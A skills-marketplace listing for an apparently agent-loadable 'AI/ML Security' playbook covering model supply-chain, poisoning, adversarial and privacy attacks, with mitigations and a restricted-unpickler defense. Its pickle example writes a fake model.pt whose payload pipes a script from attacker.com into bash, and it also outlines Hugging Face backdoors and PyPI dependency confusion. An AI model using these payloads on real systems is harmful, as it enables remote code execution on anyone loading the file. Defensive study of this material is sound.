
AI/ML Security
Assess AI and ML systems for pickle RCE, model poisoning, adversarial examples, extraction, privacy attacks, and agent-specific risks before or after shipping.
Overview
AI/ML Security is an agent skill most often used in Ship (also Operate iterate and Build integrations) that provides an expert playbook for model supply chain, adversarial, poisoning, extraction, and privacy attacks on A
Install
npx skills add https://github.com/yaklang/hack-skills --skill ai-ml-security
What is this skill?
- Model supply chain coverage including pickle-based PyTorch deserialization RCE
- Adversarial attack families: FGSM, PGD, C&W, and physical-world variants
- Training data poisoning, model stealing, and black-box extraction practicality
- Privacy attacks: membership inference, model inversion, and gradient leakage
- Routes to companion skills for prompt injection, deserialization, and dependency confusion
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You are shipping ML weights, APIs, or agents but lack a structured view of pickle RCE, poisoning, adversarial inputs, and data-leakage attacks against your stack.
Who is it for?
Solo builders and small teams launching agents, fine-tuned models, or ML-backed APIs who need red-team framing without hiring a full ML security practice.
Skip if: you build pure CRUD apps with no models, or your organization only needs formal compliance attestations and no technical threat modeling.
When should I use this skill?
Use it when assessing model supply chain attacks, adversarial examples, model poisoning, model stealing, data privacy attacks, or autonomous agent security risks.
What do I get? / Deliverables
You get a prioritized attack-oriented review map and routing to related skills so hardening and testing focus on realistic AI/ML failure modes before users or attackers find them.
- Threat-oriented review checklist aligned to AI/ML attack classes
- Pointers to related skills for prompt injection, deserialization, and dependency confusion
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
Ship/security is the primary shelf because the skill is an offensive-security playbook used to harden models, pipelines, and agents before production exposure. Security subphase fits supply-chain review of weights, deserialization, and LLM/agent abuse patterns—not day-to-day model training tutorials.
Where it fits
Review how your agent loads external model files before wiring them into production inference.
Run supply-chain and adversarial checks on checkpoints and APIs before go-live.
Re-assess poisoning and extraction risks after swapping base models or training on new user data.
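As a rough illustration of the checkpoint review described above, the sketch below walks a model directory and flags files whose format carries pickle risk. The risk ratings are copied from the format table in the skill's SKILL.md; `FORMAT_RISK` and `audit_model_dir` are hypothetical names chosen for this example and are not part of the skill. A file extension is only a first-pass signal, so treat the output as a starting point for review.

```python
from pathlib import Path

# Risk ratings taken from the format table in SKILL.md section 1.1.
FORMAT_RISK = {
    ".pt": "critical", ".pth": "critical",
    ".pkl": "critical", ".pickle": "critical",
    ".joblib": "high",
    ".npy": "medium", ".npz": "medium",
    ".safetensors": "safe", ".onnx": "safe",
}


def audit_model_dir(root):
    """Return (relative_path, risk) for each recognized model file not rated safe."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        risk = FORMAT_RISK.get(path.suffix.lower())
        # Skip directories, unknown extensions, and formats rated safe.
        if path.is_file() and risk not in (None, "safe"):
            findings.append((path.relative_to(root).as_posix(), risk))
    return findings
```

Calling `audit_model_dir("./checkpoints")` on a downloaded repository (the path is a placeholder) returns a list that can gate a CI step or feed a manual review.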
How it compares
Complements LLM prompt-injection skills with broader ML supply chain and adversarial coverage—security methodology, not an MCP monitoring server.
Common Questions / FAQ
Who is ai-ml-security for?
Developers and indie operators building AI products, loading third-party checkpoints, or exposing model APIs who need structured offensive scenarios for defensive planning.
When should I use ai-ml-security?
During Build when wiring model loaders and agents, during Ship security review before production, and during Operate iterate when updating weights, datasets, or dependencies.
Is ai-ml-security safe to install?
Review the Security Audits panel on this Prism page; the skill describes attack techniques for authorized assessment—use only on systems you own or have permission to test.
SKILL.md
# SKILL: AI/ML Security - Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert AI/ML security techniques. Covers model supply chain attacks (malicious serialization, Hugging Face model poisoning), adversarial examples (FGSM, PGD, C&W, physical-world), training data poisoning, model extraction, data privacy attacks (membership inference, model inversion, gradient leakage), LLM-specific threats, and autonomous agent security. Base models underestimate the severity of pickle deserialization RCE and the practicality of black-box model extraction.

## 0. RELATED ROUTING

- [llm-prompt-injection](../llm-prompt-injection/SKILL.md) for LLM-specific prompt injection, jailbreaking, and tool abuse techniques
- [deserialization-insecure](../deserialization-insecure/SKILL.md) for deeper coverage of Python pickle and general deserialization attack patterns
- [dependency-confusion](../dependency-confusion/SKILL.md) when the ML pipeline has supply chain risks via pip/npm package confusion

---

## 1. MODEL SUPPLY CHAIN ATTACKS

### 1.1 Malicious Model Files: Pickle RCE

Python's `pickle` module executes arbitrary code during deserialization. PyTorch `.pt`/`.pth` files use pickle by default.

```python
import pickle
import os

class MaliciousModel:
    # __reduce__ tells pickle how to rebuild the object: a callable plus its
    # arguments. The unpickler invokes that callable at load time.
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))

# Write the payload under a filename that looks like a PyTorch checkpoint.
with open('model.pt', 'wb') as f:
    pickle.dump(MaliciousModel(), f)
```

Calling `torch.load('model.pt')` on this file executes the embedded command unless `weights_only=True` is in effect.
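One general defense against this class of payload is an allowlisting unpickler, the "restricting globals" pattern from the Python `pickle` documentation. The sketch below is a minimal illustration of that pattern, not the skill's own tooling: `ALLOWED_BUILTINS`, `RestrictedUnpickler`, `restricted_loads`, `BenignProbe`, and `is_blocked` are names assumed for this example, and the probe swaps `os.system` for the harmless `os.getcwd` so that nothing dangerous runs.

```python
import builtins
import io
import os
import pickle

# Assumption for illustration: only these harmless builtins may be resolved.
ALLOWED_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global outside a small allowlist."""

    def find_class(self, module, name):
        if module == "builtins" and name in ALLOWED_BUILTINS:
            return getattr(builtins, name)
        # os.system, subprocess.Popen, eval, and similar all end up here.
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data: bytes):
    """Deserialize bytes, raising UnpicklingError on any non-allowlisted global."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class BenignProbe:
    """Stand-in for the malicious class above; os.getcwd replaces os.system."""

    def __reduce__(self):
        return (os.getcwd, ())


def is_blocked(data: bytes) -> bool:
    """Return True if the restricted loader rejects the pickle."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False
```

Plain containers such as `pickle.dumps({"layers": [1, 2, 3]})` still load because they reference no globals, while `is_blocked(pickle.dumps(BenignProbe()))` reports the probe as rejected before its callable is ever invoked. An allowlist this small will not load real model checkpoints; it only demonstrates the mechanism.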
Pickle exposure by model file format:

| Format | Risk | Mitigation |
|---|---|---|
| `.pt` / `.pth` (PyTorch) | **Critical**: pickle by default | Use `torch.load(..., weights_only=True)` (available since PyTorch 1.13, the default since 2.6) |
| `.pkl` / `.pickle` | **Critical**: raw pickle | Never load untrusted pickles |
| `.joblib` | **High**: uses pickle internally | Verify provenance |
| `.npy` / `.npz` (NumPy) | **Medium**: `allow_pickle=True` enables RCE | Use `allow_pickle=False` |
| `.safetensors` | **Safe**: tensor-only format, no code execution | Preferred format |
| `.onnx` | **Safe**: graph definition only, no arbitrary code | Preferred for inference |

### 1.2 Hugging Face Model Poisoning

```
Attack vectors:
├── Upload model with pickle-based backdoor to Hub
│   └── Users download via `from_pretrained('attacker/model')`
│       └── pickle deserialization → RCE on load
├── Backdoored weights (no RCE, but biased behavior)
│   └── Model behaves normally except on trigger inputs
│       └── Example: sentiment model returns positive for competitor's products
├── Malicious tokenizer config
│   └── Custom tokenizer code with embedded payload
└── Poisoned training scripts in model repo
    └── `train.py` with obfuscated backdoor
```

**Detection signals:**

- Files with `.pt`/`.pkl` extension instead of `.safetensors`
- Custom Python code in the repository (`*.py` files outside standard config)
- Unusual `config.json` with `trust_remote_code=True` requirement
- Model card lacking provenance, training data description, or eval results

### 1.3 Dependency Confusion in ML Pipelines

ML projects often have complex dependency chains:

```
requirements.txt:
  internal-ml-utils==1.2.3    ← private package
  torch==2.0.0
  transformers==4.30.0

Attack: register "internal-ml-utils" on public PyPI with higher version
  → pip installs attacker's version → arbitrary code in setup.py
```

---

## 2. ADVERSARIAL EXAMPLES

### 2.1 Attack Taxonomy

| Attack Type | Knowledge | Method |
|---|---|---|
| White-box | Full model access (architecture + weights) | Gradient-based: FGSM, PGD, C&W |
| Black-box (transfer) | Access to similar model | Generate adversarial examples on a surrogate, then transfer to the target |
| Black-box (query) | API access only | Esti